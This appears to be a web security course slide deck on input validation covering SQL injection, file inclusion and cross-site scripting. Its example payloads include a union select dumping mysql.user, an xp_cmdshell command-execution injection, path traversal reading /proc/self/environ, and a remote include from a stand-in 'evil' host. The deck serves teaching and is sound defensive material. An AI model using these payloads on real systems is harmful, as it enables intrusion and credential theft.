![Page 1: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/1.jpg)
Data ValidationCommon input validation problems.
![Page 2: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/2.jpg)
Types Of ProblemsSQL Injection
Local File Includes
Cross-site Scripting
![Page 3: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/3.jpg)
SQL InjectionSQL Injection is an attack where a partial or a complete SQL query is
inserted/injected into another query run by the targeted application.
![Page 4: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/4.jpg)
Types Of SQL InjectionVanilla - when errors are displayed.
Blind - when no errors are displayed.
![Page 5: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/5.jpg)
SQL BackendsThere are multiple SQL backends that have various features.
Common BackendsMsSQL (Transact-SQL)
MySQL
PostgreSQL
Oracle (PL/SQL)
Many More
![Page 6: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/6.jpg)
SQL Injection In PrincipleWorks by injecting SQL parts in already existing queries.
SELECT * FROM table WHERE column = 'injected by the user'
![Page 7: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/7.jpg)
In DetailAssuming that $value is a variable controlled by the user:
$query = "SELECT * FROM table WHERE column = '" + $value + "'";
When $value equals to ' OR '1'='1 then:
SELECT * FROM table WHERE column = '' OR '1'='1'
![Page 8: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/8.jpg)
SQL Injection TechniquesUnion Selection - to obtain values from other tables.
SELECT * FROM table WHERE column = '' UNION SELECT 'a','b','c','d','e'
Boolean Selection - to create universally true or false statements.
SELECT * FROM table WHERE column = '' OR '1'='1'
Time Selection - to measure injection by timing the execution.
SELECT * FROM table WHERE column = '' OR IF(1=1, sleep(10), 'false'))--'
![Page 9: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/9.jpg)
MsSQL Injection TechniquesTable enumeration - find the table structure.
SELECT * FROM table WHERE column = '' HAVING 1=1--'
SELECT * FROM table WHERE column = '' GROUP BY column1,columnN HAVING 1=1--
Code execution - running arbitrary commands.
SELECT * FROM table WHERE column = ''; exec master.dbo.xp_cmdshell 'command
Query delay - timing delay after query.
SELECT * FROM table WHERE column = ''; WAITFOR DELAY '0:0:30'
![Page 10: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/10.jpg)
MySQL Injection Techniques Pt. 1Finding information - retrieving various server variables and functions.
SELECT * FROM table WHERE column = '' AND 1=0 UNION SELECT @@version, 'b',
User enumeration - retrieving MySQL server users and passwords.
SELECT * FROM table WHERE column = '' UNION SELECT * FROM mysql.user#'
![Page 11: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/11.jpg)
MySQL Injection Techniques Pt. 2Table enumeration - retrieving MySQL server tables.
SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.tables#
Column enumeration - retrieving MySQL server columns.
SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.columns#
![Page 12: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/12.jpg)
SQL Injection ToolsSqlninja
Sqlmap
![Page 13: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/13.jpg)
SQL Injection Is ArtThere are many different types of tools and techniques with various
level of complexity used to exploit SQL Injection vulnerabilities.
![Page 14: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/14.jpg)
File IncludesThis attack vector is used to perform arbitrary file/url read or
execution using low-level functions and application-specific features.
![Page 15: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/15.jpg)
Types Of File IncludesLocal File Include - when the included file is local.
Remote File Include - when the included file is fetched remotely.
![Page 16: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/16.jpg)
File Include In PrincipleWorks when user data reaches a function used to fetch a file.
<?php fetchfile("./path/to/file/injected by the user") ?>
![Page 17: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/17.jpg)
In DetailAssuming that $value is a variable controlled by the user:
<?php fetchfile("./path/to/file/" . $value) ?>
When $value equals to ../../../index.php then:
<?php fetchfile("./path/to/file/../../../index.php") ?>
![Page 18: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/18.jpg)
File Include Techniques Pt. 1Usage of ../ to traverse directory structure.
<?php fetchfile("./path/to/file/../../../index.php") ?>
Usage of null (0x00) to terminate strings for low level C functions.
<?php fetchfile("./path/to/file/../../../index.php\0.txt") ?>
![Page 19: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/19.jpg)
File Include Techniques Pt. 2Usage of overlong dot (0xc0, 0xae) to by pass escape functions.
<?php fetchfile("./path/to/file/\xc0\xae./../../index.php\0.txt") ?>
Usage of system resources to cause other behaviour.
<?php fetchfile("./path/to/file/../../../../../proc/self/environ") ?>
![Page 20: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/20.jpg)
Remote File IncludesThis type of problem occurs when injecting a remote file controlled
by the attacker. In this case, the attacker has a greater control over
the exploitation process if something special is done to the file.
<?php fetchfile("http://evil/path/to/file") ?>
![Page 21: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/21.jpg)
FI Is ArtFile Include attacks are a popular mechanism for compromising web
applications.
![Page 22: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/22.jpg)
Cross-site ScriptingIs a type of vulnerability where an attacker can bypass SOP (Same
Origin Policy) through client-side injection or by abusing forms of
configuration.
![Page 23: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/23.jpg)
Types Of XSSReflected - when the injection is immediately returned.
Stored - when the injection is stored.
DOM-based - when the injection occurs due to JS.
Others - the are many other uncategorized varients.
![Page 24: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/24.jpg)
XSS In PrincipleWorks by injecting fragments of HTML/JS inside the web page.
<span>injected by the user</span>
![Page 25: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/25.jpg)
In DetailAssuming that $value is a variable controlled by the user:
<?php ?><span><?php echo $value ?></span>
When $value equals to <script>alert(1)</script> then:
<span><script>alert(1)</script></span>
![Page 26: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/26.jpg)
XSS Techniques Pt. 1When script tags are sanitized or escaped.
<span><img src=a onerror=alert(1)></span>
When the injection occurs inside an event attribute.
<button onclick="alert(1)"></button>
![Page 27: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/27.jpg)
XSS Techniques Pt. 2When the injection occurs inside JavaScript a tag.
<script>var a = ""; alert(1); "";</script>
When the injection occurs in multiple small places.
<span><script>alert(1)/* is something like */</script></span>
![Page 28: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/28.jpg)
Stored XSSThe injection is temporarily or permanently stored.
<?php $_SESSION['name'] = $_GET['name'] ?>
Later on there is this code that causes for the XSS to occur:
<?php ?><span><?php echo $_SESSION['name'] ?></span>
![Page 29: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/29.jpg)
DOM-based XSSThe injection may occur at any point but triggered via JavaScript.
<script>var match = document.location.search.match(/[?&]name=(\w+)/);
if (match) { document.write("Hello " + match[1]);}</script>
There are many different ways an injection can occur.
![Page 30: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/30.jpg)
Other Forms Of XSSThe presence of crossdomain.xml may open the app to XSS.
<?xml version="1.0" encoding="UTF-8" ?><cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>
![Page 31: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/31.jpg)
XSS Is ArtCross-site scripting is very popular and widely spread vulnerability.
![Page 32: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/32.jpg)
Other Input Validations FlawsMemory Corruption
Command Injection
LDAP Injection
XML Injection
XPATH Injection
SSI Injection
Remote File Inclusion
Many, Many More
![Page 33: Web Application Security 101 - 14 Data Validation](https://reader033.vdocument.in/reader033/viewer/2022060108/554f439fb4c905423f8b4718/html5/thumbnails/33.jpg)
LabWe will be finding data validation problems.